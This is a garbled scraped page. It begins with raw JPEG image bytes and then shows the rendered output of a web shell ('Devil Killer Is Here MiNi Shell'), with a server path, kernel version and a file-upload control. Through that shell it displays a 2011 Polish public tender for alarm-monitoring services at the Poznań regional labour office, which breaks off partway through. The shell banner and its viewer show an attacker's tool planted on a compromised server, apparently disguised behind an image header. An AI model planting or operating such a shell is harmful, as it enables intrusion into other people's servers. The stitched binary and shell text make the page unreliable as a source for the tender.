JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111202/315785-N-2011.html

<p class="kh_header"><b>Poznań: Monitorowanie systemów alarmowych zainstalowanych w budynkach 
Wojewódzkiego Urzędu Pracy w Poznaniu i w Oddziałach Zamiejscowych</b><br>
<b>Numer ogłoszenia: 315785 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 61 8463819, faks 61 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitorowanie systemów alarmowych zainstalowanych w budynkach 
Wojewódzkiego Urzędu Pracy w Poznaniu i w Oddziałach Zamiejscowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi monitorowania systemów alarmowych zainstalowanych w budynkach Wojewódzkiego Urzędu Pracy w Poznaniu i w Oddziałach Zamiejscowych.
2. Zamówienie zostało podzielone na 4 części, Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne części, z których każda stanowi odrębną część przedmiotu zamówienia:
1) Część I - Wojewódzki Urząd Pracy Poznaniu przy ul. Wawrzyńca 11:
- całodobowe monitorowanie systemu włamania,
- transmisja realizowana będzie za pośrednictwem modułu i sygnału GSM, obejmuje pomieszczenia biurowe na dwóch kondygnacjach tj. I piętro, II piętro budynku oraz hol na parterze i klatki schodowe poszczególnych kondygnacji.
Osobą do kontaktu jest Pan Przemysław Laudański nr telefonu - (61) 846-38-13.

2) Część II - Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Koninie przy ul.  Zakładowej 4:
- całodobowe monitorowanie systemu włamania, ppoż. i zalania,
- instalacja przewodowa. Instalacja systemu włamania podzielona jest na dwapodsystemy:
a) podsystem nr 1 - obszar chroniony dla Powiatowego Urzędu Pracy w Koninie - monitorowanie tego podsystemu nie jest przedmiotem zamówienia.
b) podsystem nr 2 - obszar chroniony dla Wojewódzkiego Urzędu Pracy i Agencji Rozwoju Regionalnego - obejmuje pomieszczenia biurowe na II i III piętrze, klatki schodowe poszczególnych kondygnacji, piwnice, wiatrołap - monitorowanie tego podsystemu jest przedmiotem zamówienia oraz system alarmu ppoż. i zalania obejmuje pomieszczenia piwnicy.
Osobą do kontaktu jest Pan Józef Augustiański, nr telefonu - (63) 249-71-00.

3) Część III - Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Pile 
przy al. Niepodległości 24. 
- całodobowe monitorowanie systemu włamania, ppoż.,
- instalacja przewodowa, system alarmu włamania obejmuje trzy kondygnacje tj. parter, I piętro, II piętro budynku, natomiast monitoring systemu alarmu ppoż. obejmuje piwnicę.
Osobą do kontaktu jest Pani Urszula Hoppe nr telefonu - (67) 212-30-84.

4) Część IV - Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Lesznie przy ul. Śniadeckich 5. 
- całodobowe monitorowanie systemu włamania, ppoż.
- instalacja przewodowa, obejmuje jedną kondygnację tj. I piętro, budynku - pomieszczenia biurowe i korytarz.
Osobą do kontaktu jest Pan Zdzisław Giera nr telefonu - (65) 529-57-66.

3. Zobowiązania Wykonawcy:
1) posiadanie centrum monitorowania z całodobową obsługą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Oddalone centrum monitorowania musi ponadto spełniać następujące wymogi:
a) posiadać optyczno - akustyczną sygnalizację stanów alarmowych oraz sygnalizację wykrycia uszkodzenia torów i urządzeń transmisji sygnału alarmowego,
b) zasilanie ze źródła rezerwowego powinno pozwalać na niezakłóconą pracę centrum w czasie nie krótszym niż 36 godzin,
c)   całodobowa obsługa serwisowa centrum powinna przywrócić zdolność monitorowania systemu alarmowego chronionego obiektu w czasie nie dłuższym niż 30 minut,
d) centrum musi zapewnić możliwość rejestracji, archiwizacji i odtworzenia wszystkich monitorowanych zdarzeń zaistniałych w systemie z okresu ostatnich 3 miesięcy.
2) całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. 
3) zapewnienie gotowości do interwencji załóg patrolowych, składającej się z co najmniej 2 pracowników ochrony, posiadających licencję I stopnia i wyposażonych w środki przymusu bezpośredniego w tym: kajdanki, pałka, gaz obezwładniający oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny o zwiększonej mocy.
4) spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
5) wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
6) zgłaszanie Zamawiającemu każdego przypadku uszkodzenia, bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowaniu systemu alarmowego, 
7) utrzymanie systemu alarmowego (włamania, ppoż., zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów.
4. Zamawiający zaleca przeprowadzenie wizji lokalnej obiektów opisanych w przedmiocie zamówienia. Termin wizji i szczegóły techniczne jej przeprowadzenia wymagają uzgodnień z Zamawiającym. W celu ustalenia daty i godziny wizji lokalnej prosimy 
o kontakt z osobami podanymi w opisie przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca wykaże, iż posiada koncesję do prowadzenia działalności gospodarczej w zakresie przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeżeli Wykonawca wykaże się
posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności, w okresie realizacji przedmiotu umowy, na kwotę nie mniejszą niż 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty, 
2) pełnomocnictwo/a do podpisania oferty w przypadku, jeżeli osoba podpisująca ofertę nie jest osobą umocowaną na podstawie odpisu z właściwego rejestru lub nie jest Wykonawcą,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wynagrodzenie zostanie zmienione tylko w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań, II p., pokój nr 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 09:20, miejsce: Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wojewódzki Urząd Pracy Poznaniu przy ul. Wawrzyńca 11:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi monitorowania systemów alarmowych: 
-	całodobowe monitorowanie systemu włamania,
-	transmisja realizowana będzie za pośrednictwem modułu i sygnału GSM, obejmuje pomieszczenia biurowe na dwóch kondygnacjach tj. I piętro, II piętro budynku oraz hol na parterze i klatki schodowe poszczególnych kondygnacji.
Osobą do kontaktu jest Pan Przemysław Laudański nr telefonu - (61) 846-38-13
2. Zobowiązania Wykonawcy:
1)	posiadanie centrum monitorowania z całodobową obsługą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Oddalone centrum monitorowania musi ponadto spełniać następujące wymogi:
a)	posiadać optyczno - akustyczną sygnalizację stanów alarmowych oraz sygnalizację wykrycia uszkodzenia torów i urządzeń transmisji sygnału alarmowego,
b)	zasilanie ze źródła rezerwowego powinno pozwalać na niezakłóconą pracę centrum w czasie nie krótszym niż 36 godzin,
c)	  całodobowa obsługa serwisowa centrum powinna przywrócić zdolność monitorowania systemu alarmowego chronionego obiektu w czasie nie dłuższym niż 30 minut,
d)	centrum musi zapewnić możliwość rejestracji, archiwizacji i odtworzenia wszystkich monitorowanych zdarzeń zaistniałych w systemie z okresu ostatnich 3 miesięcy.
2)	całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. 
3)	zapewnienie gotowości do interwencji załóg patrolowych, składającej się z co najmniej 
2 pracowników ochrony, posiadających licencję I stopnia i wyposażonych w środki przymusu bezpośredniego w tym: kajdanki, pałka, gaz obezwładniający oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny o zwiększonej mocy.
4)	spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
5)	wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
6)	zgłaszanie Zamawiającemu każdego przypadku uszkodzenia, bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowaniu systemu alarmowego, 
7)	utrzymanie systemu alarmowego (włamania, ppoż., zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Koninie przy ul. Zakładowej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi monitorowania systemów alarmowych: 
-	całodobowe monitorowanie systemu włamania, ppoż. i zalania,
-	instalacja przewodowa. Instalacja systemu włamania podzielona jest na dwapodsystemy:
a)	podsystem nr 1 - obszar chroniony dla Powiatowego Urzędu Pracy w Koninie - monitorowanie tego podsystemu nie jest przedmiotem zamówienia.
b)	podsystem nr 2 - obszar chroniony dla Wojewódzkiego Urzędu Pracy i Agencji Rozwoju Regionalnego - obejmuje pomieszczenia biurowe na II i III piętrze, klatki schodowe poszczególnych kondygnacji, piwnice, wiatrołap - monitorowanie tego podsystemu jest przedmiotem zamówienia oraz system alarmu ppoż. i zalania obejmuje pomieszczenia piwnicy.
Osobą do kontaktu jest Pan Józef Augustiański, nr telefonu - (63) 249-71-00.
2. Zobowiązania Wykonawcy:
1)	posiadanie centrum monitorowania z całodobową obsługą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Oddalone centrum monitorowania musi ponadto spełniać następujące wymogi:
a)	posiadać optyczno - akustyczną sygnalizację stanów alarmowych oraz sygnalizację wykrycia uszkodzenia torów i urządzeń transmisji sygnału alarmowego,
b)	zasilanie ze źródła rezerwowego powinno pozwalać na niezakłóconą pracę centrum w czasie nie krótszym niż 36 godzin,
c)	  całodobowa obsługa serwisowa centrum powinna przywrócić zdolność monitorowania systemu alarmowego chronionego obiektu w czasie nie dłuższym niż 30 minut,
d)	centrum musi zapewnić możliwość rejestracji, archiwizacji i odtworzenia wszystkich monitorowanych zdarzeń zaistniałych w systemie z okresu ostatnich 3 miesięcy.
2)	całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. 
3)	zapewnienie gotowości do interwencji załóg patrolowych, składającej się z co najmniej 
2 pracowników ochrony, posiadających licencję I stopnia i wyposażonych w środki przymusu bezpośredniego w tym: kajdanki, pałka, gaz obezwładniający oraz posiadających niezależną łączność umożliwiającą bezpośredni kontakt z centrum monitorowania i samochód interwencyjny o zwiększonej mocy.
4)	spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
5)	wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
6)	zgłaszanie Zamawiającemu każdego przypadku uszkodzenia, bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowaniu systemu alarmowego, 
7)	utrzymanie systemu alarmowego (włamania, ppoż., zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wojewódzki Urząd Pracy w Poznaniu Oddział Zamiejscowy w Pile przy al. Niepodległości 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi monitorowania systemów alarmowych:
-	całodobowe monitorowanie systemu włamania, ppoż.,
-	instalacja przewodowa, system alarmu włamania obejmuje trzy kondygnacje tj. parter, I piętro, II piętro budynku, natomiast monitoring systemu alarmu ppoż. obejmuje piwnicę.
Osobą do kontaktu jest Pani Urszula Hoppe nr telefonu - (67) 212-30-84.
2. Zobowiązania Wykonawcy:
1)	posiadanie centrum monitorowania z całodobową obsługą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia, odpowiednio zabezpieczone przed dostępem osób postronnych oraz próbami celowego uszkodzenia, zniszczenia lub zakłócenia jego pracy. Oddalone centrum monitorowania musi ponadto spełniać następujące wymogi:
a)	posiadać optyczno - akustyczną sygnalizację stanów alarmowych oraz sygnalizację wykrycia uszkodzenia torów i urządzeń transmisji sygnału alarmowego,
b)	zasilanie ze źródła rezerwowego powinno pozwalać na niezakłóconą pracę centrum w czasie nie krótszym niż 36 godzin,
c)	  całodobowa obsługa serwisowa centrum powinna przywrócić zdolność monitorowania systemu alarmowego chronionego obiektu w czasie nie dłuższym niż 30 minut,
